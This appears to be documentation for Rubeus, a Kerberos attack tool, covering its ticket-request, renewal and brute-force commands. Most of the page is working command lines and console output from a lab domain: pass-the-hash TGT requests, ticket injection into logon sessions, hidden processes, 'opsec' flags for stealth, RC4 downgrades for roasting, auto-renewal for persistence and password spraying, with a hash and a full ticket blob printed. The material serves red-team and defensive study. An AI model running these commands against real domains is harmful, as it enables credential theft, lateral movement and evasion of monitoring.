Ticket Requests & Renewals
Breakdown of the ticket request commands:
Command
Description
asktgt
Request a ticket-granting-ticket (TGT) from a hash/key or password
asktgs
Request a service ticket from a passed TGT
renew
Renew (or auto-renew) a TGT or service ticket
brute
Perform a Kerberos-based password brute-forcing attack
asktgt
The asktgt
action will build raw AS-REQ (TGT request) traffic for the specified user and encryption key (/rc4
, /aes128
, /aes256
, or /des
). A /password
flag can also be used instead of a hash - in this case /enctype:X
will default to RC4 for the exchange, with des|aes128|aes256
as options. If no /domain
is specified, the computer's current domain is extracted, and if no /dc
is specified the same is done for the system's current domain controller. If authentication is successful, the resulting AS-REP is parsed and the KRB-CRED (a .kirbi, which includes the user's TGT) is output as a base64 blob. The /ptt
flag will "pass-the-ticket" and apply the resulting Kerberos credential to the current logon session. The /luid:0xA..
flag will apply the ticket to the specified logon session ID (elevation needed) instead of the current logon session.
Note that no elevated privileges are needed on the host to request TGTs or apply them to the current logon session, just the correct hash for the target user. Also, another opsec note: only one TGT can be applied at a time to the current logon session, so the previous TGT is wiped when the new ticket is applied when using the /ptt
option. A workaround is to use the /createnetonly:C:\X.exe
parameter (which hides the process by default unless the /show
flag is specified), or request the ticket and apply it to another logon session with ptt /luid:0xA..
.
By default, several differences exist between AS-REQ's generated by Rubeus and genuine AS-REQ's. To form AS-REQ's more in line with genuine requests, the /opsec
flag can be used, this will send an initial AS-REQ without pre-authentication first, if this succeeds, the resulting AS-REP is decrypted and TGT return, otherwise an AS-REQ with pre-authentication is then sent. As this flag is intended to make Rubeus traffic more stealthy, it cannot by default be used with any encryption type other than aes256
and will just throw a warning and exit if another encryption type is used. To allow for other encryption types to be used with the /opsec
changes, the /force
flag exists.
Requesting a ticket via RC4 hash for [email protected], applying it to the current logon session:
C:\Rubeus>Rubeus.exe asktgt /user:dfm.a /rc4:2b576acbe6bcfda7294d6bd18041b8fe /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.4.1
[*] Action: Ask TGT
[*] Using rc4_hmac hash: 2b576acbe6bcfda7294d6bd18041b8fe
[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)
[*] Building AS-REQ (w/ preauth) for: 'testlab.local\dfm.a'
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFmjCCBZagAwIBBaEDAgEWooIErzCCBKthggSnMIIEo6ADAgEFoQ8bDVRFU1RMQUIuTE9DQUyiIjAg
oAMCAQKhGTAXGwZrcmJ0Z3QbDXRlc3RsYWIubG9jYWyjggRlMIIEYaADAgESoQMCAQKiggRTBIIETwrl
zIpKjTT11eteJCn+0rtlKwtTW/8XvoWXy61rOCrOIo16YPiMe4usXoJaOqsvCydMgd6955hT+IoFMyGG
VfVxetoM1Oa5aPA2sfzJeogn4RpFBoY5vjjKBzPaTJptPRX7Wjg0o1FTszJET4mhQyLKxQMgprKcc2mz
yniQzGPI19O95aSoPpNar+4lKlyBsL4QjSEeBdZQ2/Ab1JVu3eh1xCsWkKUUlabbzeZwo8SG0QkZ0DKk
qOD8hx5wbQ+w8emcLvHMIrmg1xO2OPngK76C3daeiS59UVADSz/n3H7Tfuk+EXSdZ8DC4/c8KIZvHsC6
cO/ymVFxyuRJLg7VThl8keZmbWzYei6xAwH7mUAUEA1lk0pEHx12nAHcKILsbS3F9wAcHMNEGe/Xa3UK
INJ0q+JvdJpCPo/wgyu7wjKgsdpgUV0siVfpGaxG7yh6s3U2tAlBWnWdGF/Gy/FkOk/hJxhTTHcHa5XE
LTaXY9cnraee+llJqmOnHfjPa5+XNTnVtBZjT0SPRnSXfdPG5BgiXYlCjr5ykhF8MdVE1Se+WtEZJuPj
lYrCtWo2oEjBbYMb3YGTcWh5+oWNY1QdxSpyFc8IDQOTOCnQ+nsQf78phU7svTBm0b5AqqPD/olz1RYm
f4qR+90TcASaQGwHUQbpFnLb2U9BHwNS+SlRwafFT5qlTmXaqoQMMjknospm0+v0U8hd8KbZ4jwK2hM+
vE74bOiAMdjTf5YLDorRyuFUoa7oIaJZTXxsLmqZsBCsUnH5etXTb9vHj7Dl27wyP9snRHIWuE8Rdo9Z
zAJK6PESaBcUqhKqkjWLUKDuT2+SCduPVF6+3QJB0xLJrwXKp/MiV418H/pHRoy6JkKKw2m1bw45P8Az
l54g75WJqEiAzj/+I64TUfbEFJtd9OHujAKzjMMiKRQKwTKR1Jfb6gTrv6K0GCTJ15W84DeWc47jTutE
HbWxuKib3niTTM5YcHZcN6h/V8Zef8r4fdhY20xGCwqlT9X5md96+647bRq/AZDtiAEaVAH5f3QTQen8
o6XpVqSoZxRASEs3oKFfNunBFJ+QxOL4A47iO1JH0wlM7L2Vx+QeDMfqUh3i9S71YBLdHtPflo8ivmNS
gf0dIeAE2rHRNQn+q7vvrl4r/Bxy3CikzBWnq9Nff8vUJmZ0MQBc4mBpykuuFtLuEJOELdUzW4uCF/9a
JffKDnWk0lIDymImtxqTO0Y/mk0zEQ7RZNUIR3vtrNSO84CjZ/YFYCIdIR5wCzztPSZ0RH7C4lVueBO5
ZoDiWYvPuOQsZHkP2XD+GQtu0hN6MOfLOKGVmNrKs1KRfWhbqnTQudjFSkvgHlgjIslKJDa6WzmSQhdW
fPIA9ggjCmQtyB6seiYi9LdJuQ+GiiF2UphTEJ+a5DR6rGYbg4hhd+ru2Z8Lt5rBojliLnedafyZJ15t
alU+n8aNdIPXfVmsR3caTXkncNBlo4HWMIHToAMCAQCigcsEgch9gcUwgcKggb8wgbwwgbmgGzAZoAMC
ARehEgQQ+zY8adXi2NuvkAxl1ohUOKEPGw1URVNUTEFCLkxPQ0FMohIwEKADAgEBoQkwBxsFZGZtLmGj
BwMFAEDhAAClERgPMjAxOTAyMjUyMzA2MDdaphEYDzIwMTkwMjI2MDQwNjA3WqcRGA8yMDE5MDMwNDIz
MDYwN1qoDxsNVEVTVExBQi5MT0NBTKkiMCCgAwIBAqEZMBcbBmtyYnRndBsNdGVzdGxhYi5sb2NhbA==
[*] Action: Import Ticket
[+] Ticket successfully imported!
[*] Action: Describe Ticket
UserName : dfm.a
UserRealm : TESTLAB.LOCAL
ServiceName : krbtgt/testlab.local
ServiceRealm : TESTLAB.LOCAL
StartTime : 2/25/2019 3:06:07 PM
EndTime : 2/25/2019 8:06:07 PM
RenewTill : 3/4/2019 3:06:07 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : +zY8adXi2NuvkAxl1ohUOA==
Requesting a ticket via aes256_hmac hash for [email protected], starting a new hidden process, and applying the ticket to that logon session.
The /luid
and /createnetonly
parameters require elevation!
C:\Rubeus>Rubeus.exe asktgt /user:dfm.a /domain:testlab.local /aes256:e27b2e7b39f59c3738813a9ba8c20cd5864946f179c80f60067f5cda59c3bd27 /createnetonly:C:\Windows\System32\cmd.exe
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: Create Process (/netonly)
[*] Showing process : False
[+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 7564
[+] LUID : 0x3c4c241
[*] Action: Ask TGT
[*] Using aes256_cts_hmac_sha1 hash: e27b2e7b39f59c3738813a9ba8c20cd5864946f179c80f60067f5cda59c3bd27
[*] Target LUID : 63226433
[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)
[*] Building AS-REQ (w/ preauth) for: 'testlab.local\dfm.a'
[*] Connecting to 192.168.52.100:88
[*] Sent 234 bytes
[*] Received 1620 bytes
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFujCCBbagAwIBBaEDAgEWooIEvzCCBL...(snip)...
[*] Action: Import Ticket
[*] Target LUID: 0x3c4c241
[+] Ticket successfully imported!
asktgs
The asktgs action will build/parse a raw TGS-REQ/TGS-REP service ticket request using the specified TGT /ticket:X
supplied. This value can be a base64 encoding of a .kirbi file or the path to a .kirbi file on disk. If a /dc
is not specified, the computer's current domain controller is extracted and used as the destination for the request traffic. The /ptt
flag will "pass-the-ticket" and apply the resulting service ticket to the current logon session. One or more /service:X
SPNs must be specified, comma-separated.
The supported encryption types in the constructed TGS-REQ will be RC4_HMAC, AES128_CTS_HMAC_SHA1, and AES256_CTS_HMAC_SHA1. In this case, the highest mutually supported encryption will be used by the KDC to build the returned service ticket. If you want to force DES, RC4, or AES128/256 keys, use /enctype:[RC4|AES128|AES256|DES]
.
In order to request a service ticket for an account using an enterprise principal (i.e. [email protected]), the /enterprise
flag can be used.
By default, several differences exist between TGS-REQ's generated by Rubeus and genuine TGS-REQ's. To form TGS-REQ's more in line with genuine requests, the /opsec
flag can be used, this will also cause an additional TGS-REQ to be sent automatically when a service ticket is requested for an account configured for unconstrained delegation. As this flag is intended to make Rubeus traffic more stealthy, it cannot by default be used with any encryption type other than aes256
and will just throw a warning and exit if another encryption type is used. To allow for other encryption types to be used with the /opsec
changes, the /force
flag exists.
Requesting a TGT for dfm.a and then using that ticket to request a service ticket for the "LDAP/primary.testlab.local" and "cifs/primary.testlab.local" SPNs:
C:\Rubeus>Rubeus.exe asktgt /user:dfm.a /rc4:2b576acbe6bcfda7294d6bd18041b8fe
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: Ask TGT
[*] Using rc4_hmac hash: 2b576acbe6bcfda7294d6bd18041b8fe
[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)
[*] Building AS-REQ (w/ preauth) for: 'testlab.local\dfm.a'
[*] Connecting to 192.168.52.100:88
[*] Sent 230 bytes
[*] Received 1537 bytes
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFmjCCBZagAwIBBaEDAgEWoo...(snip)...
C:\Rubeus>Rubeus.exe asktgs /ticket:doIFmjCCBZagAwIBBaEDAgEWoo...(snip)... /service:LDAP/primary.testlab.local,cifs/primary.testlab.local /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: Ask TGS
[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)
[*] Building TGS-REQ request for: 'LDAP/primary.testlab.local'
[*] Connecting to 192.168.52.100:88
[*] Sent 1514 bytes
[*] Received 1562 bytes
[+] TGS request successful!
[*] base64(ticket.kirbi):
doIFzjCCBcqgAwIBBaEDAgEWoo...(snip)...
[*] Action: Import Ticket
[+] Ticket successfully imported!
[*] Action: Ask TGS
[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)
[*] Building TGS-REQ request for: 'cifs/primary.testlab.local'
[*] Connecting to 192.168.52.100:88
[*] Sent 1514 bytes
[*] Received 1562 bytes
[+] TGS request successful!
[*] base64(ticket.kirbi):
doIFzjCCBcqgAwIBBaEDAgEWoo...(snip)...
[*] Action: Import Ticket
[+] Ticket successfully imported!
C:\Rubeus>Rubeus.exe klist
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: List Kerberos Tickets (Current User)
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 2/10/2019 6:44:43 PM ; 2/10/2019 11:44:09 PM ; 2/17/2019 6:44:09 PM
Server Name : cifs/primary.testlab.local @ TESTLAB.LOCAL
Client Name : dfm.a @ TESTLAB.LOCAL
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
[1] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 2/10/2019 6:44:43 PM ; 2/10/2019 11:44:09 PM ; 2/17/2019 6:44:09 PM
Server Name : LDAP/primary.testlab.local @ TESTLAB.LOCAL
Client Name : dfm.a @ TESTLAB.LOCAL
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
Requesting a service ticket for an AES-enabled service account, specifying that we only support RC4_HMAC:
C:\Rubeus>Rubeus.exe asktgs /ticket:doIFmjCCBZagAwIBBaEDAgEWoo...(snip).../service:roast/me /enctype:rc4
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.4.1
[*] Action: Ask TGS
[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)
[*] Requesting 'rc4_hmac' etype for the service ticket
[*] Building TGS-REQ request for: 'roast/me'
[+] TGS request successful!
[*] base64(ticket.kirbi):
doIFrjCCBaqgAwIBBaEDA...(snip)...
[*] Action: Describe Ticket
UserName : dfm.a
UserRealm : TESTLAB.LOCAL
ServiceName : roast/me
ServiceRealm : TESTLAB.LOCAL
StartTime : 2/25/2019 3:10:59 PM
EndTime : 2/25/2019 8:09:54 PM
RenewTill : 3/4/2019 3:09:54 PM
Flags : name_canonicalize, pre_authent, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : Gg3zZicIl5c50KGecCf8XA==
renew
The renew action will build/parse a raw TGS-REQ/TGS-REP TGT renewal exchange using the specified /ticket:X
supplied. This value can be a base64 encoding of a .kirbi file or the path to a .kirbi file on disk. If a /dc
is not specified, the computer's current domain controller is extracted and used as the destination for the renewal traffic. The /ptt
flag will "pass-the-ticket" and apply the resulting Kerberos credential to the current logon session.
Note that TGTs MUST be renewed before their EndTime, within the RenewTill window.
C:\Rubeus>Rubeus.exe renew /ticket:ticket.kirbi /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: Renew TGT
[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)
[*] Building TGS-REQ renewal for: 'TESTLAB.LOCAL\dfm.a'
[*] Connecting to 192.168.52.100:88
[*] Sent 1506 bytes
[*] Received 1510 bytes
[+] TGT renewal request successful!
[*] base64(ticket.kirbi):
doIFmjCCBZagAwIBBaEDAgEWoo...(snip)...
[*] Action: Import Ticket
[+] Ticket successfully imported!
The /autorenew
flag will take an existing /ticket:X
.kirbi file/blob, sleep until endTime-30 minutes, auto-renew the ticket and display the refreshed ticket blob. It will continue this renewal process until the allowable renew-till renewal window passes.
C:\Rubeus>Rubeus.exe renew /ticket:doIFmjCCBZagAwIBBaEDAgEWoo...(snip)... /autorenew
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: Auto-Renew TGT
[*] User : [email protected]
[*] endtime : 2/10/2019 11:44:09 PM
[*] renew-till : 2/17/2019 6:44:09 PM
[*] Sleeping for 263 minutes (endTime-30) before the next renewal
[*] Renewing TGT for [email protected]
[*] Action: Renew TGT
[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)
[*] Building TGS-REQ renewal for: 'TESTLAB.LOCAL\dfm.a'
[*] Connecting to 192.168.52.100:88
[*] Sent 1506 bytes
[*] Received 1510 bytes
[+] TGT renewal request successful!
[*] base64(ticket.kirbi):
doIFmjCCBZagAwIBBaEDAgEWoo...(snip)...
brute
The brute action will perform a Kerberos-based password bruteforcing attack.
C:\Rubeus>Rubeus.exe brute /password:Password123!! /noticket
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.5.0
[-] Blocked/Disabled user => Guest
[-] Blocked/Disabled user => DefaultAccount
[-] Blocked/Disabled user => krbtgt
[-] Blocked/Disabled user => disabled
[+] STUPENDOUS => newuser:Password123!!
[*] base64(newuser.kirbi):
doIFLDCCBSigAwIBBaEDAgEWooIELDCCBChhggQkMIIEIKADAgEFoRAbDlR...(snip)...
Last updated